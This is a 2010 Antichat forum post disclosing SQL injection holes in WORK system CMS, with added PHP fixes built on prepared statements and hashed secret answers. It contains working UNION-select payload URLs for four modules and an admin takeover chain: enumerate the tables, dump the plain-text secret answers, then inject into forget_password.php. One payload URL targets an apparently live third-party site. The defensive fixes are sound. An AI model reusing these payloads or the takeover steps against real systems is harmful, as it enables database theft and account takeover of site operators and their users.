05.03.2010, 22:52
Reservists Of Antichat - Level 6
WORK system CMS e-commerce
http://sourceforge.net/projects/worksystem/
module/catalogue/view_catalogue.php
PHP code:
    // checks intval() of the parameter, but then assigns the raw request string
    $select_catalogue = ( isset($_REQUEST['select_catalogue']) and intval($_REQUEST['select_catalogue']) >= 1 ) ? $_REQUEST['select_catalogue'] : "";
    ...
    # read data of product supplier : addresses
    $error_select = "";
    $total_select = 0;
    // $select_catalogue is concatenated into the WHERE clause unquoted
    $query_selecta = "SELECT a.CREATOR,a.CUSTOMER_TYPE_ID,b.POSTCODE as POSTCODEA,b.ADDRESS as ADDRESSA,b.TOWN as TOWNA,b.COUNTRY as COUNTRYA,b.USERNAME as USERNAMEA,b.EMAIL as EMAILA,b.PHONE as PHONEA,b.WEB_SITE as WEBSITEA
        FROM ".$g_db_prefix."CATALOGUE_SUPPLIER a, ".$g_db_prefix."USER b
        where ID_CATALOGUE=".$select_catalogue." and a.CREATOR=b.USERID ";
    ...
    $query_select = "SELECT a.CREATOR,a.CUSTOMER_TYPE_ID,c.POSTCODE,c.ADDRESS,c.TOWN,c.COUNTRY,c.EMAIL,c.COMPANY_NAME,c.PHONE
        FROM ".$g_db_prefix."CATALOGUE_SUPPLIER a, ".$g_db_prefix."SHOPPING_DELIVERY c
        where ID_CATALOGUE=".$select_catalogue." and c.USERID=a.CREATOR";
    ...
    $query_select = "SELECT ID,TITLE,STATE,LINK,DESCRIPTION,CREATOR,FILE_NAME,
        UNIX_TIMESTAMP(DATE_CREATION) as DATE_CREATION, ID_THEMA, HITS,
        PRICE,DISCOUNT,ID_CURRENCY,STOCK,STOCK_CURRENT,PERIOD_DELIVERY,
        COLORS1,COLORS2,COLORS3,COLORS4,COLORS5,COLORS6,REFERENCE_FREE
        FROM ".$g_db_prefix."CATALOGUE where ID=$select_catalogue";
SQL
http://localhost/worksystem_4_0_39/module/catalogue/view_catalogue.php?select_catalogue=1+and+1=2+union+select+1,2,3,4,5,6,version%28%29,user(),9,10+--+&work_url=04eaaac39da09ffd351cf366b0bd70aa#
SQL
http://localhost/worksystem_4_0_39/module/catalogue/view_catalogue.php?select_catalogue=1+and+1=2++union+select+1,2,3,4,5,6,user(),8,9+--+&work_url=04eaaac39da09ffd351cf366b0bd70aa#
SQL
http://localhost/worksystem_4_0_39/module/catalogue/view_catalogue.php?select_catalogue=1+and+1=2++union+select+1,version(),3,database(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+--+&work_url=04eaaac39da09ffd351cf366b0bd70aa#
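The root cause in view_catalogue.php is that the ternary validates intval() of the parameter but assigns the raw string, which then goes into the SQL text unquoted. The following is an added example of the same lookup with both defects removed; it is not code from WORK system CMS. Function names (catalogue_id_from_request, fetch_catalogue, safe_prefix) are this example's own, and it assumes a connected mysqli object $db built with mysqlnd (needed for get_result()) plus the $g_db_prefix the CMS already defines.

```php
<?php
declare(strict_types=1);

// Added example, not WORK system CMS code: the catalogue lookup with the
// integer actually validated and the id bound as a statement parameter.

// The original tests intval($_REQUEST['select_catalogue']) >= 1 and then uses
// the unmodified string. Return the validated integer itself, or null when the
// parameter is missing or is not a positive integer.
function catalogue_id_from_request(array $request): ?int
{
    if (!isset($request['select_catalogue']) || is_array($request['select_catalogue'])) {
        return null;
    }
    // FILTER_VALIDATE_INT rejects "1 and 1=2 union select ...", "1abc", "1.0"
    $id = filter_var($request['select_catalogue'], FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 1],
    ]);
    return $id === false ? null : $id;
}

// The table prefix is configuration, not user input, but it cannot be bound as
// a parameter, so it is confined to a fixed character class before use.
function safe_prefix(string $prefix): string
{
    if (!preg_match('/^[A-Za-z0-9_]{0,32}$/', $prefix)) {
        throw new InvalidArgumentException('bad table prefix');
    }
    return $prefix;
}

// One catalogue row by id. The id is sent to MySQL separately from the SQL
// text, so no value of $id can alter the statement.
function fetch_catalogue(mysqli $db, string $g_db_prefix, int $id): ?array
{
    $table = safe_prefix($g_db_prefix) . 'CATALOGUE';
    $stmt = $db->prepare(
        "SELECT ID, TITLE, STATE, LINK, DESCRIPTION, CREATOR, FILE_NAME,
                UNIX_TIMESTAMP(DATE_CREATION) AS DATE_CREATION, ID_THEMA, HITS,
                PRICE, DISCOUNT, ID_CURRENCY, STOCK, STOCK_CURRENT, PERIOD_DELIVERY,
                COLORS1, COLORS2, COLORS3, COLORS4, COLORS5, COLORS6, REFERENCE_FREE
         FROM `{$table}` WHERE ID = ?"
    );
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $db->error);
    }
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// Usage in view_catalogue.php, assuming $db and $g_db_prefix from include_config.php:
// $id = catalogue_id_from_request($_REQUEST);
// if ($id === null) { http_response_code(400); exit('invalid select_catalogue'); }
// $catalogue = fetch_catalogue($db, $g_db_prefix, $id);
```

The same two changes apply to the supplier queries ($query_selecta and the SHOPPING_DELIVERY query) and to view_room.php and view_news.php, which use the identical validate-then-use-raw pattern.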
-----------------------
module/booking/view_room.php
PHP code:
    // same pattern as view_catalogue.php: intval() is checked, the raw string is used
    $select_catalogue = ( isset($_REQUEST['select_catalogue']) and intval($_REQUEST['select_catalogue']) >= 1 ) ? $_REQUEST['select_catalogue'] : "";
    ...
    $query_select = "SELECT ID,TITLE,STATE,LINK,DESCRIPTION,CREATOR,FILE_NAME,RESUME,
        UNIX_TIMESTAMP(DATE_CREATION) as DATE_CREATION, ID_THEMA, HITS,
        PRICE,DISCOUNT,ID_CURRENCY,STOCK,STOCK_CURRENT,PERIOD_DELIVERY,
        COLORS1,COLORS2,COLORS3,COLORS4,COLORS5,COLORS6,REFERENCE_FREE
        FROM ".$g_db_prefix."CATALOGUE where ID=$select_catalogue";
SQL
http://localhost/worksystem_4_0_39/module/booking/view_room.php?amp;work_url=0168e286bf&select_catalogue=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,version()+limit+1,1
-----------------------
module\forum\detailforum.php
PHP code:
    include($g_include_forum."include_display_detailforum.php");
include_config.php
PHP code:
    global_register('GET','POST');

    // emulates register_globals: every key of $_GET / $_POST becomes a global
    // variable of the same name, overwriting whatever was there before
    function global_register() {
        $num_args = func_num_args();
        if ($num_args > 0) {
            for ($i = 0; $i < $num_args; $i++) {
                $method = strtoupper(func_get_arg($i));
                if (($method != 'SESSION') && ($method != 'GET') && ($method != 'POST') && ($method != 'SERVER') && ($method != 'COOKIE') && ($method != 'ENV')) {
                    die("The \"$method\" is invalid argument, The argument of global_register must be the following: GET, POST, SESSION, SERVER, COOKIE, or ENV");
                }
                $varname = "_{$method}";
                global ${$varname};
                foreach (${$varname} as $key => $val) {
                    global ${$key};
                    ${$key} = $val;
                }
            }
        } else {
            die('You must specify at least one argument');
        }
    }
module\forum\include\include_display_detailforum.php
PHP code:
    // $select_forum, $state_display and $profile_forum are globals, so with
    // global_register('GET','POST') above all three can be set from the request
    $query_select = "SELECT ID,ID_INIT,TITLE,STATE,DESCRIPTION,CREATOR,UNIX_TIMESTAMP(DATE_CREATION) as DATE_CREATION,LINK
        FROM ".$g_db_prefix."FORUM_INIT where ID=$select_forum and STATE=$state_display $profile_forum order by ORDER_DISPLAY asc, DATE_CREATION asc";
SQL
http://localhost/worksystem_4_0_39/module/forum/detailforum.php?select_forum=3+union+select+1,2,user(),4,version(),6,7,8+--+&work_url=2fa5af6c22#
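The forum case is different from the catalogue one: detailforum.php never reads select_forum itself; global_register('GET','POST') in include_config.php copies every request key into a global of the same name, so $select_forum, $state_display and $profile_forum all arrive from the URL. The added example below (not code from WORK system CMS) shows what to put in place of that emulation: each script declares the parameters it accepts and their types, and every other key is ignored, so variables the SQL interpolates can only be set by server-side code. The spec format and the names import_request_vars, detailforum_params and fetch_forum_init are this example's own; it assumes a mysqli $db built with mysqlnd and the CMS's $g_db_prefix.

```php
<?php
declare(strict_types=1);

// Added example, not WORK system CMS code: whitelist import of request
// parameters as a replacement for global_register('GET','POST').

// Spec: name => ['type' => 'int'|'string', 'default' => value, 'max' => max length]
function import_request_vars(array $spec, array $request): array
{
    $out = [];
    foreach ($spec as $name => $rule) {
        $out[$name] = $rule['default'] ?? null;
        if (!array_key_exists($name, $request) || is_array($request[$name])) {
            continue;   // missing, or an array where a scalar is expected: keep the default
        }
        $raw = (string) $request[$name];
        switch ($rule['type']) {
            case 'int':
                $v = filter_var($raw, FILTER_VALIDATE_INT);
                if ($v !== false) {
                    $out[$name] = $v;   // "3 union select ..." fails validation, default stays
                }
                break;
            case 'string':
                $max = $rule['max'] ?? 255;
                // bounded length, no control characters; still only ever bound, never concatenated
                if (strlen($raw) <= $max && preg_match('/^[^\x00-\x1F\x7F]*$/', $raw)) {
                    $out[$name] = $raw;
                }
                break;
            default:
                throw new InvalidArgumentException("unknown type for parameter $name");
        }
    }
    return $out;
}

// What detailforum.php would accept. $state_display and $profile_forum are
// absent on purpose: they are decided by application code, not by the request.
function detailforum_params(array $request): array
{
    return import_request_vars([
        'select_forum' => ['type' => 'int',    'default' => 0],
        'work_url'     => ['type' => 'string', 'default' => '', 'max' => 64],
    ], $request);
}

// The FORUM_INIT query with the request-derived values bound. Whatever
// $profile_forum appends in the original must be a constant SQL fragment chosen
// by server code from a fixed set; it is omitted here rather than interpolated.
function fetch_forum_init(mysqli $db, string $g_db_prefix, int $select_forum, int $state_display): array
{
    if (!preg_match('/^[A-Za-z0-9_]{0,32}$/', $g_db_prefix)) {
        throw new InvalidArgumentException('bad table prefix');
    }
    $stmt = $db->prepare(
        "SELECT ID, ID_INIT, TITLE, STATE, DESCRIPTION, CREATOR,
                UNIX_TIMESTAMP(DATE_CREATION) AS DATE_CREATION, LINK
         FROM `{$g_db_prefix}FORUM_INIT`
         WHERE ID = ? AND STATE = ?
         ORDER BY ORDER_DISPLAY ASC, DATE_CREATION ASC"
    );
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $db->error);
    }
    $stmt->bind_param('ii', $select_forum, $state_display);
    $stmt->execute();
    $rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
    $stmt->close();
    return $rows;
}

// Usage in detailforum.php, with $state_display coming from the application:
// $p = detailforum_params($_REQUEST);
// $rows = fetch_forum_init($db, $g_db_prefix, $p['select_forum'], $state_display);
```

Removing the global_register() call also closes the path by which $g_include_forum, used in the include() above, could be overwritten from the request.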
------------------------
module\news\view_news.php
PHP code:
    // same pattern again: intval() is checked, the raw string is used
    $select_news = ( isset($_REQUEST['select_news']) and intval($_REQUEST['select_news']) >= 1 ) ? $_REQUEST['select_news'] : "";
    ...
    $query_select = "SELECT a.ID,a.TITLE,a.STATE,a.LINK,a.DESCRIPTION,b.CREATOR,a.FILE_NAME,
        UNIX_TIMESTAMP(a.DATE_CREATION) as DATE_CREATION,a.WHERE_IMAGE,a.SIZE_IMAGE,a.HITS,a.WRAPPER
        FROM ".$g_db_prefix."NEWS a, ".$g_db_prefix."NEWS_SUPPLIER b where ID=$select_news and a.ID=b.NEWS_ID ";
SQL
http://localhost/worksystem_4_0_39/module/news/view_news.php?select_news=12+union+select+1,user(),3,database(),version(),6,7,8,9,10,11,12+--+
------------------------------
Logging in as admin
Besides the standard login : password entry, there is a login : Secret answer entry, and the Secret answer is stored in the user table
in plain text.
Find out the table prefix in the database.
http://localhost/worksystem_4_0_39/module/news/view_news.php?select_news=12+union+select+1,TABLE_NAME,3,TABLE_SCHEMA,5,6,7,8,9,10,11,12+from+information_schema.tables+--+
http://www.artpeinture.fr/work/module/news/view_news.php?select_news=12+union+select+1,TABLE_ NAME,3,TABLE_SCHEMA,5,6,7,8,9,10,11,12+from+inform ation_schema.tables+--+&work_url=8cd560377a
Read the username and Secret answer
http://localhost/worksystem_4_0_39/module/news/view_news.php?select_news=12+union+select+1,name,3,ANSWER,5,6,7,8,9,10,11,12+from+work_user+--+
Alternative way in
http://localhost/worksystem_4_0_39/module/user/forget_password.php?f_username=admin&work_url=8cd560377a
or
http://localhost/worksystem_4_0_39/module/user/forget_password.php?f_username=blabla'+or+GROUP_ID=7+--+&work_url=8cd560377a
enter the secret answer and we are admin.
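Two separate weaknesses combine here: f_username is quoted into the SQL text of forget_password.php (a string-context injection, unlike the numeric ones above), and the secret answer sits in the USER table in plain text, so any read of that table is a login. The added example below is not code from WORK system CMS; it shows the username/secret-answer path with the username bound as a parameter and the answer stored as a password_hash() digest, plus a one-time migration for the existing plain-text rows. Table and column names (USER, USERID, NAME, ANSWER) follow what the post shows; function names are this example's own, and it assumes a mysqli $db built with mysqlnd and the CMS's $g_db_prefix.

```php
<?php
declare(strict_types=1);

// Added example, not WORK system CMS code: secret-answer verification with a
// bound username and a hashed, salted answer.

// Canonicalise so "Paris " and "paris" match for the legitimate user while the
// stored value stays a slow, salted hash.
function canonical_answer(string $answer): string
{
    return mb_strtolower(trim($answer), 'UTF-8');
}

function secret_answer_hash(string $answer): string
{
    return password_hash(canonical_answer($answer), PASSWORD_DEFAULT);
}

// The prefix is configuration, not input, but it cannot be bound, so confine it.
function checked_prefix(string $prefix): string
{
    if (!preg_match('/^[A-Za-z0-9_]{0,32}$/', $prefix)) {
        throw new InvalidArgumentException('bad table prefix');
    }
    return $prefix;
}

// True only when the user exists and the answer matches the stored hash.
function verify_secret_answer(mysqli $db, string $g_db_prefix, string $username, string $answer): bool
{
    $table = checked_prefix($g_db_prefix) . 'USER';
    $stmt = $db->prepare("SELECT ANSWER FROM `{$table}` WHERE NAME = ? LIMIT 1");
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $db->error);
    }
    $stmt->bind_param('s', $username);   // "blabla' or ..." is now just a username matching nothing
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    // Always run password_verify, against a throwaway hash when the user is
    // unknown, so response time does not reveal which usernames exist.
    static $dummy = null;
    if ($dummy === null) {
        $dummy = password_hash('no-such-user', PASSWORD_DEFAULT);
    }
    $stored = (is_array($row) && is_string($row['ANSWER'])) ? $row['ANSWER'] : $dummy;
    $ok = password_verify(canonical_answer($answer), $stored);
    return is_array($row) && $ok;
}

// One-time migration: rehash every answer that is still plain text. Returns the
// number of rows changed; rows already holding a recognised hash are skipped.
function migrate_plaintext_answers(mysqli $db, string $g_db_prefix): int
{
    $table = checked_prefix($g_db_prefix) . 'USER';
    $res = $db->query("SELECT USERID, ANSWER FROM `{$table}`");
    $upd = $db->prepare("UPDATE `{$table}` SET ANSWER = ? WHERE USERID = ?");
    if ($res === false || $upd === false) {
        throw new RuntimeException('query failed: ' . $db->error);
    }
    $n = 0;
    while ($row = $res->fetch_assoc()) {
        if (!is_string($row['ANSWER']) || password_get_info($row['ANSWER'])['algoName'] !== 'unknown') {
            continue;   // empty, or already a password_hash() digest
        }
        $hash = secret_answer_hash($row['ANSWER']);
        $id = (int) $row['USERID'];
        $upd->bind_param('si', $hash, $id);
        $upd->execute();
        $n++;
    }
    $upd->close();
    return $n;
}
```

Because a secret answer has far less entropy than a password, hashing it is only half the fix: the forget_password handler should also throttle attempts per account and, ideally, send a reset link to the registered e-mail rather than grant a session directly on a correct answer.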